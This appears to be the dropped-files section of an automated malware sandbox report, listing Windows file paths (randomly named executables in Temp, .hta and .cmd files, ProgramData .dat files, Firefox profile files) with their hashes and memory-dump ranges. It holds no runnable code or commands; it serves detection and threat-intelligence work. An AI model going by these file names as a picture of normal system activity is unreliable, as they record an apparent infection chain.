SHA256 fcaa43fb66fde6705e446746b382b3531e42803745822873c6c4c94f83b64d59
SHA512 43f42610a376a96a8e3a566b2cf062480757039eb31e28240456f474530ad1795472249f1ddb196860d01781df4af4824a3111c21033619ffc4d3e6f7f717725

C:\Users\Admin\AppData\Local\Temp\10062570101\12c2d2f481.exe

MD5 0282be73e52cb40d1893413356ecc019
SHA1 288fe6f9b2cf7be34a2a2be1cb9be01d56048c49
SHA256 7696e4e6fb26e0a6c4e320326e784f0d560db8922109a72e04076af0d72b0664
SHA512 be2447a02ee1b237cbf83c8c1d2dc876e79dbdab8297bb5a1ea3d4ffd8c8b1b2564327f285cac30f1f3b42480400e4259a6e323f5b7f265f6c91008ae85e8e82

memory/1944-86-0x0000000000400000-0x000000000055C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10062720101\a16b636c8b.exe

MD5 c47d95cdfaa1a720ab35c329eaf7ddeb
SHA1 0bfa3caf0a382415566209682cc24bb705cc1f68
SHA256 b002b8be5d3a93f326869492c1458fa14bfb83bbc23b5cd3208e80e27c4f12a9
SHA512 bc6c779ba802a90733e3bf68910eeeb734d00bfe351b0e8c44b3fa2efa8b962b7dc5c8aca3c40ccfcec452e15451454f0f08460e01130c3f335cb71df8feb438

C:\Users\Admin\AppData\Local\Temp\Ro1bFndli.hta

MD5 4e2782c3233ae400cf95b0e06375fe4c
SHA1 6a2441486c6b428c8a88269ad0090f320c1285b6
SHA256 90a091e69e89f1c13a17007b81ee7e88c1cc0e9d419d0304ef49dc5edda04414
SHA512 e3b9df19deea5956a42dac124f83ff28e1d108dd99d4e2474e7e1c2f19bb6e101685ce87f69799680e03e9c7f2466bf59087d0e64dd4a5ea9f19d8fa8ee1efed

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sd2vbmp4.2n0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\10062730121\am_no.cmd

MD5 189e4eefd73896e80f64b8ef8f73fef0
SHA1 efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512 be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

memory/1944-135-0x0000000000400000-0x000000000055C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 6195a91754effb4df74dbc72cdf4f7a6
SHA1 aba262f5726c6d77659fe0d3195e36a85046b427
SHA256 3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5
SHA512 ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c210c72ee1f238aa78e146e36f88754e
SHA1 29fb48cd4974781993b228d37b5675df61264d2d
SHA256 5c313965f94afaef85628cf9f4a6e1b3be21a3564e35c76a99b578d3656e6c2a
SHA512 2cca512f0e27779ca62c16f718e29f314fa0252893d094a63730dfbe1cc0aa8a0ceb856cefbc964f39255669722d4dae83ffa49143adcca60cd85f9488138ee3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4bc2be70ef7e0df4ca65910c621d605b
SHA1 8c419f3f26eb08b31f4a772104e87b5d46329af6
SHA256 b28d412c0aecb152168eb1efbd6232668122677234db6f0172416786a92d9830
SHA512 b9e30a162dab223cffef0aac5e471087d24e1a80f7a168514922ad372152ab929a184a0ddbcd87ca997f0b97d8398d41a0694d8ea42b2a82d081518c07165e1d

C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe

MD5 98d249e93dc8a0a37b9225c1f9a42abd
SHA1 695d7b5ef9ff0c135d5bc2522c5805c00020c82b
SHA256 5bc0bf81cd564d205ca4243e2111eb1ab116ba68ae65deea98cf3a2a52deaa8f
SHA512 a1d5c86a0fe43bf0f9d3490c406b04eeae2259bf6f8a76a85819ee7364da5f42d775a36d06a6c2c518e33e8dfa4e90f3cfeb912e1a1023c23445aedb10935804

C:\Temp\7Ate2U9Z1.hta

MD5 16d76e35baeb05bc069a12dce9da83f9
SHA1 f419fd74265369666595c7ce7823ef75b40b2768
SHA256 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA512 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 870c9e4de7b4da63f455058dcc2a5765
SHA1 1ab9681288bd8819d1cc4d29f7d4805e8a050037
SHA256 8ecc7161e67dd41c514713cdf8d7b3c2be2329d3009596ac73a0b4ad59776a81
SHA512 ff4b475ea7f2bb75a65bfd6898add5858be3f22aabb9c492b0b3232bdf77a8b436930f2812542086af77afe07cad425550ab89aa86198ab7b1cf4d5a1f25223d

C:\Users\Admin\AppData\Local\Temp\10062890101\3efcc3b4c6.exe

MD5 60dd2030e1ff1f9a3406ddc438893694
SHA1 b01f2c39b1046bc892c9db78898e1c063b21836f
SHA256 d77580f219e5b86e38e34d2125862a58d03a76ac1b6dbb40bc4f65b114bbb4ee
SHA512 15f9aad02632481934b3f271debf73d5cf61bdd824d0f4a47e38b391186f7de16ba5f1d51f391625b945ff14b55d90cd31799b1483837aea732a45effef94246

memory/1996-227-0x0000000000E60000-0x0000000000EBC000-memory.dmp

memory/1996-228-0x0000000005BC0000-0x0000000006164000-memory.dmp

memory/2952-230-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2952-232-0x0000000000400000-0x000000000045E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10062900101\92d896b7a7.exe

MD5 ebcd88613fed4a2608bc1768817bce4d
SHA1 afbba964372b91250c4c04ec9ee649a36a50b95f
SHA256 124e9553ae88df251e56e6dade1476fec8ef86fd579d978ca3b0d66ca3506a3e
SHA512 45f0bdf0c0c5d63662723110985b5dd7c295f70f79d55080dada64fa8480f074f6c7276f2a8acf712fd5793eabe3be77e2c72470ad282707eface715f1cbd113

memory/992-280-0x00000000002B0000-0x0000000000767000-memory.dmp

C:\ProgramData\4C37BB32B51BA9A6.dat

MD5 a182561a527f929489bf4b8f74f65cd7
SHA1 8cd6866594759711ea1836e86a5b7ca64ee8911f
SHA256 42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA512 9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

memory/4936-297-0x0000000007150000-0x00000000071E6000-memory.dmp

memory/4936-298-0x00000000070E0000-0x0000000007102000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 06ad34f9739c5159b4d92d702545bd49
SHA1 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512 c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

C:\Users\Admin\AppData\Local\Temp\10062910101\4e7fab29a7.exe

MD5 6561c25c19e19f1cb72d61d4c83fff7d
SHA1 0afde35d7217f377642a4fde2b733c30edcbed82
SHA256 0c33fade35e2a90baed41e12cec5783f525d8ccbc74dd1be54315cef697b2d18
SHA512 4e1c347a17aedc07dd960a5ba3c926ff810b025257a6a3ea91c3a1da6571d533a080e58d1db9ccb36c3f4ce1297f534e769adceabe481616a04d7b90070ff33a

memory/2212-322-0x0000000000050000-0x0000000000348000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fdbd897a9ff49dbeb32afba4435ec642
SHA1 2ca5e682e477fdfb1eb68846ab20278c1f32b394
SHA256 e4db00181622dc712f23d019c2eb05a89acad0095a4d3ddd70039e7576f298d3
SHA512 3e6004a2a38afebda88cedd6cca40b315b6ada0456e37dfafc723b35d1598b20649221f9359d09063813de107213dae7a5a953b7f8259735faeb2310e9c5687c

memory/992-325-0x00000000002B0000-0x0000000000767000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10062920101\2157e39777.exe

MD5 124bba2cbe0bd1a0e7403b6003006a9e
SHA1 5238bad10b7743a8496e2fb1bd63c93a8b97f266
SHA256 1118ac24b10268323425567a456c821491449e4f51fc1f0315202a295875acb0
SHA512 970f42d781e55818c8405bc6fd0b9cdf7a14d1f4c2247c93c0193f6c497f0bc58c2264ea678c9a2fa0b038cec69bab5aa7ffe913c6ff990c308921501672f71c

memory/3656-340-0x00000000009E0000-0x0000000001612000-memory.dmp

memory/2212-341-0x0000000000050000-0x0000000000348000-memory.dmp

memory/2212-342-0x0000000000050000-0x0000000000348000-memory.dmp

memory/992-343-0x00000000002B0000-0x0000000000767000-memory.dmp

memory/3656-345-0x00000000009E0000-0x0000000001612000-memory.dmp

memory/3656-344-0x00000000009E0000-0x0000000001612000-memory.dmp

memory/324-358-0x0000000000510000-0x000000000053F000-memory.dmp

C:\ProgramData\209A0D9393C47190.dat

MD5 f310cf1ff562ae14449e0167a3e1fe46
SHA1 85c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256 e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA512 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

C:\ProgramData\1232DCF5D55FC594.dat

MD5 e5255232caf353cf5f46513af1352fdc
SHA1 36bb600caeae9b1aeb6cadb070b5b3ae0f08e29a
SHA256 54068471caeede3ebcc48f21cc5d9d8dddace93485d5daf10717415457ef098b
SHA512 9d62608bf3a713d2e6b08e05304d7b404f9bcc56e46f7438be7a14347d2d97dab2f13fe90527155625fcf754cfceec975538c10a9bb620f25b736057436f1b1b

C:\ProgramData\87D457C229B30313.dat

MD5 4dd07a122751ef8ccbfe3e08472eadb1
SHA1 f464e924e948caf5ec5017b2cc0418f603a9c79a
SHA256 8d44ab9149fb07384bdd677b529227726b608c726c57f1710f5c7f08f645bb54
SHA512 f7a067cb8f844c8b0924006500e18a13026f120c2a7c9e5ff21fc7c1af80d6a3b9f537e3cb9d7c7975a3bd96ee4ab29c2df2198e6abd7b4328fb75af07c58e9c

C:\Users\Admin\AppData\Local\Temp\10062930101\13866c738c.exe

MD5 3f8a7305cc0f9b7211be0928311de539
SHA1 f23b0e82ba9b347bb3f93dc0106c76189ab4c26c
SHA256 ad6fd9f1a4b495cc3ec679f0b57a136f81e12e68db5b25baec990ceb107e1b79
SHA512 afc6ff1e9bcd403d678197bb8ff21907d02d7c95ed796356b24dcd590a6d978a10eb1db9d3e82ed3d07e8d5ea0b29372c64bd029a62ed14526038e5e1193e485

C:\ProgramData\B1437FE0192C89C7.dat

MD5 9618e15b04a4ddb39ed6c496575f6f95
SHA1 1c28f8750e5555776b3c80b187c5d15a443a7412
SHA256 a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512 f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

C:\ProgramData\077FF07F93D3B441.dat

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

memory/324-392-0x0000000000510000-0x000000000053F000-memory.dmp

memory/324-387-0x0000000000510000-0x000000000053F000-memory.dmp

memory/3656-397-0x00000000009E0000-0x0000000001612000-memory.dmp

memory/1988-401-0x0000000000AB0000-0x00000000014AC000-memory.dmp

memory/2212-402-0x0000000000050000-0x0000000000348000-memory.dmp

memory/324-406-0x0000000010000000-0x000000001001C000-memory.dmp

memory/992-410-0x00000000002B0000-0x0000000000767000-memory.dmp

C:\ProgramData\508FD350ACC60399.dat

MD5 3ea18b675809540f2607c68906a1288e
SHA1 77419b2401ff7c3d9eddc3018a2565d8673d6e2c
SHA256 cc7217e2425007bea6837a66c08fe368b3f57cc5bc4130b15e338e624c5b529f
SHA512 bed714da330681dd4ec01c43f3a2ae36f8abce2aae0016aeb631f2c1fa6ea1165ba9e4ff6341450dda186a4842007769e87750d7020d02a0bec3a66bdaa196cc

C:\ProgramData\140F5167DC6BE219.dat

MD5 119b7eba367c49d531dae8c62ca74386
SHA1 a8975fb5b6154c7402977f40b6f8bb93b05776c3
SHA256 6687b299a3292cfcaf96bc9c22c8aec2afdd2934b91b253214ee22b9b4140a76
SHA512 88d87d2cc1b923eff7d2effdd22323dafaf417b9da08d3cd66955900d8ad071139794da35173025f7621fa268a36f66ef7098f1467629a41888f185724fa1442

C:\ProgramData\18A8FC50D25A5F96.dat

MD5 40f3eb83cc9d4cdb0ad82bd5ff2fb824
SHA1 d6582ba879235049134fa9a351ca8f0f785d8835
SHA256 cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0
SHA512 cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

C:\ProgramData\3A63027C04D889B8.dat

MD5 2af05c837619933dba8ef7413b504701
SHA1 ccd925653d6c87816768b7f8c0592f88d30c7fb5
SHA256 6f74c08b173af69de63ffa61dba097befc758e3108f2abc00e43bb7e563fa2cc
SHA512 bbd711c89ccc3f0184e2e8686d1c285b1d28ef81889d049a5c8325f8c6a6f6b4ea938023af25d868a61517b2957951ed17ce94b07415aa0e324c22f0012d1f76

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\I86J5WJL\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\AppData\Local\Temp\10062940101\26d8edfd34.exe

MD5 932b3c66bbc714c1f9fdf5a841a53863
SHA1 cd2bcbc950a772d1b0b53a8961997ff32906be1d
SHA256 a8b0ffbbc57214cbe166084665fbbf0c81b989e6c9a7e6df3e28d8d2bf2cc7e1
SHA512 f4971846b1bafd604856e96465b9e6df2492c57f3cc19cc085b9f8cd6e100c2275b1e4d6f8ded65fe5b352ca2194b3f956ac6f33c1385727a928c8e44ab1fb8a

memory/4904-440-0x0000000000D40000-0x0000000001049000-memory.dmp

memory/1988-442-0x0000000000AB0000-0x00000000014AC000-memory.dmp

memory/1988-443-0x0000000000AB0000-0x00000000014AC000-memory.dmp

memory/2212-445-0x0000000000050000-0x0000000000348000-memory.dmp

memory/2016-449-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1988-448-0x0000000000AB0000-0x00000000014AC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10062950101\f33a39d263.exe

MD5 655697ac09c74c41ed719736103c40e7
SHA1 7641ab00bfb93d90660aa44c91a2ac6a1518f134
SHA256 77cdb927f92b6d97a88f12fdbf7da51844fea64dfea67653e3a44a9759aba66d
SHA512 431f8ed6a81d954c045982b3e4653fa946e1e35839e6a83dbc4f572918af88514bfba29968f47e7a638d20bffdfb87402cf784deb43c94b7e73d944f66732c59

memory/4972-465-0x00000000001F0000-0x00000000008A3000-memory.dmp

memory/4972-473-0x00000000001F0000-0x00000000008A3000-memory.dmp

memory/2212-475-0x0000000000050000-0x0000000000348000-memory.dmp

memory/4904-481-0x0000000000D40000-0x0000000001049000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10062960101\5d8a752ab6.exe

MD5 cf70eeed9e6093c83dc6338226d2fee9
SHA1 c854a8b3d9558541aeade0f01224fc7e8ad92fce
SHA256 d4a1f66f891ec93a587d6513b2365179c814e1d734c5b5bc7311301a676719e5
SHA512 c9796f73fd93e8ea960d1dcd834b5a89e2457ca519f6717ac715c09575237de6291a43786b9cc29e7b8f7ba216ae223ea09db0dff30b521c2eb26e8cd8ce2885

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\pending_pings\9a2ec262-9b5b-4cb3-8ee2-5e127c710b70

MD5 d59c6e42dd1ac7688e8b900333f2b1c3
SHA1 d1b693bdd484da1f8cd34d30e92719b7e92a5db7
SHA256 3a843da6d93d248e521c822a924111688ee4e130b61a434c0dcde4492b7d87ce
SHA512 79186879054ea2f0240407e95ba7a584f42b20db05b48735c8474b831bab182cf3416ba5704c1df271e701655bd1d93e23be32b2df0675f3a3f12bc8cfd30889

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\db\data.safe.tmp

MD5 098e38abc691c26b052a34d541052a82
SHA1 8e2a7aeaee35fb6ae36d93f350230960dde6a5c9
SHA256 1ab56841c67f69380527cc6baa952f5e5e5fb29ddf7325652424b051b6bdeba4
SHA512 409d0654197893f4ffe3850115b031c1291105a7b3588446a335718f88bef1e77af2f444ed10d8ae3c4baf49719a1789ba7cd914ca88c41e02450309e74a7017

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\pending_pings\46e2021d-5103-430b-8511-2daebf94e384

MD5 6cbb30e0166a1f76dcb212edaf456bfe
SHA1 17fb08fa37720881546c1caa3449de7679771d59
SHA256 5014d01183d2215d80321d6d5bfcea025c89dc149b6af52cb6e0c88d0e35bb55
SHA512 dc2471fb5d91954e01f64dee7b7cd951b2789e41cafde15a0eb0006a8c7dffbca1bbf58da57556734054ce9be78a9d1e7e64b0246c43ea60b4e67cbf0c7f254d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\db\data.safe.tmp

MD5 2899db646c514cc91916401e5492434f
SHA1 8831f1990e852a45e7e5a1743571a3e525681b63
SHA256 c9fdd166ec11b85e5d8fcb2e45135ece79d2724e1e2eff810ca9810236d48f46
SHA512 f973642b63cf080a677ee65d044874719079d5c14420a3edbd5818317fd1e7315ba74e6ff2560c96d0c88e5094bec8a820c2dd96e16ec5984bf016ddf05ecd62

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\AlternateServices.bin

MD5 82a16dcbecb2110ff29beabf1750fab5
SHA1 85b715479203126cda7213b26dd4fbf9bf2bf5d5
SHA256 305abaf34bb4f21d68338a40a0770cd89a21bd4597313f540101ad3a8731f01c
SHA512 a092a68e76f69b7e8570c65c81b628878b55ec8324f38c37078f4dca58809f397e4298c207263911ba6f94526e0f12c4b7874cc9791b5c7a8ae6e85f0ec909f3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs.js

MD5 850144c018eff92f07e5d99b0a7b30f8
SHA1 8ed6f1df9b4589de1cfcc2dcaacc0a4980e745f1
SHA256 5cb8c9a9815dc2f59122a38f3c99812a33e66cd47746bf5f3d385d811fcd2678
SHA512 3e91daa8892d6b9e0c069a24123015c8720b2ea2dfd8b1783c6719ff891a92610fe55ccffbf10afa655fd8aa9aa38f494d2f0f9501512b76f46a9160ca11ed60

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs.js

MD5 7ddffd2adba83fd683bda9ab45d757aa
SHA1 50dedf5865856d880eaa88a71c082c888e68c855
SHA256 57021c903108c2077ebc3725c1e81b60316d20f00f022a9f7c049a3c7a720a1a
SHA512 060757df8f9ed8a9fea277917633f7717c4006d63f9796e6c9d347fb49c3498ff650d4a07cc19fedc507067498f0a556ea86aa67c3341886bc1fadef00d91c7a

C:\Users\Admin\AppData\Local\Temp\10062970101\108a92f678.exe

MD5 19525425361a89e2a13bfda00bce4f2f
SHA1 f766e61138d15675516f434e4fbfa7b27e49edbb
SHA256 79841400858b03959ccf05615db0d7e3d59f3bb80818e2547f9aa07afd2ad667
SHA512 cbde52614db36e058a560225856d32187739b0e2f741de9552c8c74ae4291de9c66d684cdc890d18c1e341dc5ed418dcdf9d52d4cb1a4ce498fffebcd1a8f28f

memory/2276-845-0x0000000000250000-0x00000000006AC000-memory.dmp

memory/2276-846-0x0000000000250000-0x00000000006AC000-memory.dmp

memory/2276-847-0x0000000000250000-0x00000000006AC000-memory.dmp

memory/2276-872-0x0000000000250000-0x00000000006AC000-memory.dmp

memory/2276-875-0x0000000000250000-0x00000000006AC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MGQ8IQ23\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

C:\Users\Admin\Desktop\YCL.lnk

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\datareporting\glean\db\data.safe.tmp

MD5 5917cb5f4ff83241584f91fa851df323
SHA1 1cbd28f5d9123016e2155c03f846b3dda18cfbc5
SHA256 83f47699d65765ee5fddc952159fb2d686bfab868ca55a6e67b9cc3854f82126
SHA512 3572a200e36d01ff756989ef5ca326722346f7fe6e005ffac7f3318738c8b37a65aaca8248db10602c73abf4b33e3b6b9c4bd29e5faebc653306843d25bdb640

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\AlternateServices.bin

MD5 52c201c0b0ced0f0c3c117fda5ce6d7f
SHA1 a9ae4e9636bd447b27defa568881e845ee5c194d
SHA256 02909e7ced7d7c63993aedaa95ac1f6884908d5177759aa6f6ede23b5356f829
SHA512 d507c5216901634801a5264a596c675a4982702ec2b28c688ccdb0a2a54990d07e9feaa04a76b4153c21a59a889240a3b93697896a22d31831bc173f11530033

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs-1.js

MD5 fa166feb0f3da3b9855974a55dda3100
SHA1 41b4a4aad99bca7938a04e09d8b4f721cef06488
SHA256 2bc2e2fa5441da48f17f525ec70a5cb4555e4b1d1d2527fd83ccb103ea013d70
SHA512 0c04f3a77185dee9187de48a32ec48d1343407e47ad98ff2684fa1e19a457e0dadd92fbf09ae1dac55995765072938191ce17bea10340d69456e526d4a05ee02

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

MD5 0c068cd0f69e1d3d0208c1da1ee0e15c
SHA1 369d15394d5e19686aada59ecd72135e92f13240
SHA256 431a590a033bcc457de22d761c23f213fdae04ce3a7c9e0471fd502170ae6b79
SHA512 b9f99d7bba5bd5c4fab593673c99ad66f9ec8e4e925f8bb046baca8bde603ca5df40e00ad42d0450d06f615955f6803d27778299b94308f83871d7719fcae204

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lxy3zzzm.default-release\prefs-1.js

MD5 76a90b8dcd3782db143eb4191e2686c5
SHA1 8b4f7c6134bbbc858e409e96a388fa93672f5fb3
SHA256 2cb2435291457d3164c7fd4c64b0f555b9c1be463e96425f6bdc4a81d49933b0
SHA512 0cf35a410cb3819a8c906e5a118bcd3815ef4c793afc19bee2d92bca549e01dcdd7825f50b7ab2357080b4af8365050d00b14e3ab5628c5afdf49b4d2993bcab